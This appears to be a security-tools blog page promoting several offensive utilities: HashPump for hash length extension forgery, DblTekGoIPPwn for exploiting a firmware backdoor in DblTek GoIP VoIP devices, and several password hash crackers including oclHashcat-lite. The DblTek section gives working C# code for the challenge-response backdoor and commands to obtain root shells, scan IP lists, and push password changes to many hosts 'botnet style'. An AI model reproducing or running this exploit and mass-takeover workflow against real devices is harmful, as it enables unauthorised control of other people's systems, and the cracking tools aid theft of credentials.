HashPump - A Tool To Exploit The Hash Length Extension Attack In Various Hashing Algorithms

A tool to exploit the hash length extension attack in various hashing algorithms.
Currently supported algorithms: MD5, SHA1, SHA256, SHA512.

Help Menu

$ hashpump -h
HashPump [-h help] [-t test] [-s signature] [-d data] [-a additional] [-k keylength]
    HashPump generates strings to exploit signatures vulnerable to the Hash Length Extension Attack.
    -h --help          Display this message.
    -t --test          Run tests to verify each algorithm is operating properly.
    -s --signature     The signature from known message.
    -d --data          The data from the known message.
    -a --additional    The information you would like to add to the known message.
    -k --keylength     The length in bytes of the key being used to sign the original message with.
    Version 1.2.0 with CRC32, MD5, SHA1, SHA256 and SHA512 support.
    <Developed by bwall(@botnet_hunter)>

Sample Output

$ hashpump -s '6d5f807e23db210bc254a28be2d6759a0f5f5d99' --data 'count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo' -a '&waffle=liege' -k 14
0e41270260895979317fff3898ab85668953aaa2
count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02(&waffle=liege

Compile & install

$ git clone https://github.com/bwall/HashPump.git
$ apt-get install g++ libssl-dev
$ cd HashPump
$ make
$ make install

apt-get and make install require root privileges to run correctly. The actual requirement is for -lcrypto, so depending on your operating system, your dependencies may vary.
On OS X HashPump can also be installed using Homebrew:

$ brew install hashpump

Mentions
HashPump has been mentioned in a few write-ups. If you are wondering how you can use HashPump, these are some great examples.

• http://ctfcrew.org/writeup/54
• http://d.hatena.ne.jp/kusano_k/20140310/1394471922 (JP)
• http://conceptofproof.wordpress.com/2014/04/13/plaidctf-2014-web-150-mtgox-writeup/
• http://achatz.me/plaid-ctf-mt-pox/
• http://herkules.oulu.fi/thesis/nbnfioulu-201401141005.pdf
• https://github.com/ctfs/write-ups/tree/master/plaid-ctf-2014/mtpox

Python Bindings
Fellow Python lovers will be pleased with this addition. Saving me from writing an implementation of all these hash algorithms with the ability to modify states in Python, Python bindings have been added in the form of hashpumpy. This addition comes from zachriggle.

Installation
These Python bindings are available on PyPI and can be installed via pip. pip install hashpumpy

Usage

>>> import hashpumpy
>>> help(hashpumpy.hashpump)
Help on built-in function hashpump in module hashpumpy:

hashpump(...)
    hashpump(hexdigest, original_data, data_to_add, key_length) -> (digest, message)

    Arguments:
        hexdigest(str):      Hex-encoded result of hashing key + original_data.
        original_data(str):  Known data used to get the hash result hexdigest.
        data_to_add(str):    Data to append
        key_length(int):     Length of unknown data prepended to the hash

    Returns:
        A tuple containing the new hex digest and the new message.
>>> hashpumpy.hashpump('ffffffff', 'original_data', 'data_to_add', len('KEYKEYKEY'))
('e3c4a05f', 'original_datadata_to_add')

Python 3 note
hashpumpy supports Python 3. Different from the Python 2 version, the second value (the new message) in the returned tuple from hashpumpy.hashpump is a bytes-like object instead of a string.

Download HashPump

Read More

DblTekGoIPPwn - Tool to check if an IP of a DblTek GoIP is vulnerable to a challenge-response login system, execute remote commands botnet style, and generate responses to challenges

Tool to exploit challenge response system in vulnerable DblTek GoIP devices. Can generate responses to specified challenges, test hosts for the vulnerability, run commands on vulnerable hosts, and drop into a root shell on any vulnerable host.

The Vulnerability
On March 2nd, 2017, Trustwave released a vulnerability that security researchers found in the DblTek GoIP VoIP Phone. The vulnerability was a backdoor in the firmware for an account named 'dbladm'. When a user entered this as their username in a telnet prompt, the system would present a challenge that when followed with the right response, gave the user a root shell on the system.
The problem with such a challenge response system is that the devices are as secure as the algorithm for generating the responses, which was reverse engineered from firmware binaries provided by DblTek. Using this algorithm, a root shell can be aquired on ANY DblTek GoIP device.
Original Article: https://www.trustwave.com/Resources/SpiderLabs-Blog/Undocumented-Backdoor-Account-in-DBLTek-GoIP/
Using the description of the backdoor provided in the article, I was able to write what I believe to be some of the first exploit code for this vulnerability. The core of this is of course the algorithm to generate the response based on a given challenge. Here is a function to do this written in C#.

static string ComputeResponse(string challengeStr)
{
    int challenge = Convert.ToInt32(challengeStr.Substring(1)); // Get just the number after 'N'.

    string modified = (challenge + 20139 + (challenge >> 3)).ToString(); // Perform some dummy 1337 operations.

    byte[] buffer = new byte[64];
    // Copy the string into the first part of the buffer.
    for (int i = 0; i < modified.Length; i++)
        buffer[i] = (byte)modified[i];

    var md5 = MD5.Create();
    byte[] hash = md5.ComputeHash(buffer); // Calculate the MD5 of the buffer.

    StringBuilder sb = new StringBuilder(); // Will hold the results.
    // Take the unpadded hex value of the first six bytes of the MD5.
    for (int i = 0; i < 6; i++)
        sb.Append(hash[i].ToString("x"));

    return sb.ToString(); // Profit
}

DblTekGoIPPwn Command Line Interface (CLI)
When DblTekPwn is ran without arguments, the help is displayed. This is the output:

USAGE: DblTekPwn.exe [MODE] [HOSTS] [OUTPUT]

[MODE]:
-c --compute-response [CHALLENGE]         Computes a response to the given challenge.
-r --root-shell                           Starts a root shell with the vulnerable host.
-s --send-commands    [COMMAND_FILE]      Sends commands from a file to vulnerable hosts.
-t --test                                 Tests hosts and determines if they are vulnerable.
-h --help                                 Displays this help and exits.

[HOSTS]:
-n --name             [IP]                Specifies a single IP address.
-f --file             [IP_FILE]           Specifies a file with IP\nIP\nIP.

[OUTPUT]:
-o --output           [OUTPUT_FILE]       Specifies an output file. Default stdin.

Examples

Getting a Root Shell on a Vulnerable System
DblTekGoIPPwn makes it easy to get a root shell on any vulnerable system. Simply run the following command using the vulnerable IP.

DblTekPwn.exe --root-shell --name 192.168.1.1

You will see output that looks like this:

Password: ***********

From here you can begin entering commands (there is no shell prompt).

Calculating a Challenge Response
Say you wanted to calculate the response to a GoIP challenge N1746203308 . You would just run the following command.

DblTekPwn --compute-response N1746203308

The output will be the response:

d6176d3aab2

Checking a List of IPs
Say you wished to check list.txt of IPs for GoIPs that are vulnerable and send this output to results.txt . First make sure that the IPs are in format ip:port (port is default 23) and that the IPs are seperated by a newline \n . The following command could then be ran.

DblTekPwn.exe --test --file list.txt --output results.txt

list.txt:

192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323

results.txt:

192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False

The False or True after the host indicates whether or not the IP is vulnerable.

Sending Commands to a List of IPs
Say you had a list of commands (which is really a list of telnet inputs) in cmds.txt to send to list.txt of IPs and send the output to results.txt . First make sure that the IPs are in format ip:port (port is default 23) and that BOTH the IPs AND commands are seperated by a newline \n in their respective files. The following command could then be ran.

DblTekPwn.exe --send-commands cmds.txt --file list.txt --output results.txt

list.txt:

192.168.1.0
192.168.1.1
192.168.1.2:1337
192.168.1.3
192.168.1.4:2323

cmds.txt:

passwd root
toor
toor

exit

results.txt:

192.168.1.0 False
192.168.1.1 True
192.168.1.2:1337 True
192.168.1.3 False
192.168.1.4:2323 False

The False or True after the host indicates whether or not the connection was successfully made and the commands delivered.

Download DblTekGoIPPwn

Read More

[Hash Console v1.5] All-in-one Command-line tool to generate hash md5, sha1, sha256, sha384, sha512, lm, ntlm, base64, crc32, rot13

Hash Console is the all-in-one command-line based tool to quickly generate more than 15 different type of hashes. It can generate hash for any given file or simple text.

Hashes or checksums are used for multiple purposes including file integrity verification, encryption, password storage etc. Hash Console help you easily and quickly quickly computing the hash for given file or text.

Currently it supports following popular hash types

• MD5 family (md2, md4, md5)
• SHA family (sha1, sha256, sha384, sha512)
• BASE64
• ROT13
• CRC32
• ADLER32
• HAVAL256
• LM
• NTLM
• RIPEMD160
• WHIRLPOOL

Being a command-line tool makes it ideal for automation and easy to use on remote systems.

 Download Hash Console v1.5

Read More

[Salted Hash Kracker v1.5] Recover the Password from Salted Hash text

Salted Hash Kracker is the free all-in-one tool to recover the Password from Salted Hash text.

These days most websites and applications use salt based hash generation to prevent it from being cracked easily using precomputed hash tables such as Rainbow Crack. In such cases, 'Salted Hash Kracker' will help you to recover the lost password from salted hash text.

It also allow you to specify the salt position either in the beginning of password(salt+password) or at the end of the password (password+salt). In case you want to perform normal hash cracking without the salt then just leave the 'Salt field' blank.

Currently it supports password recovery from following popular Hash types

• MD5
• SHA1
• SHA256
• SHA384
• SHA512

It uses dictionary based cracking method which makes the cracking operation simple and easier. You can find good collection of password dictionaries (also called wordlist) here & here

Download Salted Hash Kracker v1.5

Read More

[Hash Kracker Console] Tool to find out the password from the Hash

Hash Kracker Console is the all-in-one command-line tool to find out the password from the Hash.

Currently it supports password recovery from following popular Hash types

• MD5
• SHA1
• SHA256
• SHA384
• SHA512

Also it offers 4 types of Password Recovery methods based on the complexity of password

• Dictionary Crack
• Hybrid Crack
• Brute-force Crack
• Pattern based Brute-force Crack

Being a command-line makes it faster and easy for automation. It is fully portable tool and includes installer also.

It works on wide range of platforms starting from Windows XP to Windows 8.

Download Hash Kracker Console v1.0
More

Read More

[oclHashcat-lite v0.15] Worlds fastest NTLM, MD5, SHA1, SHA256 and Descrypt Cracker

Features

• Worlds fastest NTLM, MD5, SHA1, SHA256 and descrypt cracker
• Free
• Multi-GPU (up to 128 gpus)
• Multi-OS (Linux & Windows native binaries)
• Multi-Platform (OpenCL & CUDA support)
• Multi-Algo (see below)
• Low resource utilization, you can still watch movies or play games while cracking
• Focuses one-shot, lightweight hashes
• Supports mixed GPU types
• Supports markov attack
• Supports mask attack
• Supports distributed cracking
• Supports pause / resume while cracking
• Supports sessions
• Supports restore
• Supports hex-salt
• Supports hex-charset
• Integrated thermal watchdog
• ... and much more

Algorithms

• MD5
• md5($pass.$salt)
• Joomla
• SHA1
• nsldap, SHA-1(Base64), Netscape LDAP SHA
• sha1($pass.$salt)
• nsldaps, SSHA-1(Base64), Netscape LDAP SSHA
• Oracle 11g
• MSSQL(2000)
• MSSQL(2005)
• MySQL
• MD4
• md4($pass.$salt)
• NTLM
• Domain Cached Credentials, mscash
• SHA256
• sha256($pass.$salt)
• descrypt, DES(Unix), Traditional DES
• SHA512
• sha512($pass.$salt)
• Cisco-PIX MD5
• Double MD5
• vBulletin < v3.8.5
• vBulletin > v3.8.5
• IPB2+, MyBB1.2+
• LM
• Oracle 7-10g, DES(Oracle)
• SHA-3(Keccak)
• Half MD5
• NetNTLMv1-VANILLA / NetNTLMv1+ESS
• NetNTLMv2
• Cisco-IOS SHA256

Download here: http://adf.ly/145xZ2

type: driver

file: host programs
desc: added support for AMD ADL v5.0 library

type: feature
file: hashcat-cli
desc: added mode -m 5500 = NetNTLMv1-VANILLA / NetNTLMv1+ESS
trac: #51
trac: #96

type: feature
file: hashcat-cli
desc: added mode -m 5600 = NetNTLMv2
trac: #56

type: feature
file: kernels
desc: added -m 5700 = Cisco-IOS SHA256
cred: philsmd

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so that it accepts only 16 byte input, see next change why
trac: #89

type: feature
file: kernels
desc: modified -m 5100 = Half MD5 so it can crack middle and right portions, too (not just left)
trac: #89

type: bug
file: kernels
desc: fixed bug in NVidia version had to switch back to bitness-depending kernels

type: bug
file: kernels
desc: fixed bug in NVidia version writing to constant memory from kernel isnt allowed

type: bug
file: hashcat-cli
desc: fixed bug in benchmark-mode, do not run MD5 again at end

type: bug
file: hashcat-cli
desc: fixed bug in benchmark-mode, Memory stepping when doing a benchmark
trac: #57

Read More